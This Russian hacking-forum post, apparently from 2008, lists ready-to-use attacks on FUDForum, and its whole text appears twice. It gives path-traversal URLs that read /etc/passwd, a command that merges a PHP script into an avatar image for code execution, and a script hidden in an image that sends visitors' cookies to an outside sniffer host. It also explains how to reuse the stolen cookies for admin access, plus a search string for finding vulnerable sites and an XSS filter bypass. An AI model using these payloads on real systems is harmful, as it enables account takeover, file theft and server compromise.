Solide Snake
12.01.2008, 23:25
[Обзор] Уязвимости FUDForum
Офф. Сайт www.fudforum.org
Актуальная версия 2.7.7
Исходники Скачать (http://www.softlinks.ru/download/script.php?scriptID=261)
Уязвимость в admbrowse.php
Уязвимость в admbrowse.php позволяет просматривать произвольные файлы
admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
FUD Forum 2.7.1 PHP code injection vurnelability
Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом.
Под linux/unix
cat foo.png foo.php > upload_me.php
В win в простом Notepad.
Уязвимость в tmp_view.php
Уязвимость позволяет просматривать произвольные файлы.
/tmp_view.php?file=/etc/passwd
Кража cookie
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим:
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И получаем права аминистратора.
Для поиска:
Powered by: FUDforum 2.7.4
XSS
На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения:
Бага
В слове javascript букву t нужно заменить на код & # 116 ; без пробелов.
(c) (http://www.securitylab.ru)
Офф. Сайт www.fudforum.org
Актуальная версия 2.7.7
Исходники Скачать (http://www.softlinks.ru/download/script.php?scriptID=261)
Уязвимость в admbrowse.php
Уязвимость в admbrowse.php позволяет просматривать произвольные файлы
admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
FUD Forum 2.7.1 PHP code injection vurnelability
Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом.
Под linux/unix
cat foo.png foo.php > upload_me.php
В win в простом Notepad.
Уязвимость в tmp_view.php
Уязвимость позволяет просматривать произвольные файлы.
/tmp_view.php?file=/etc/passwd
Кража cookie
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим:
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И получаем права аминистратора.
Для поиска:
Powered by: FUDforum 2.7.4
XSS
На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения:
Бага
В слове javascript букву t нужно заменить на код & # 116 ; без пробелов.
(c) (http://www.securitylab.ru)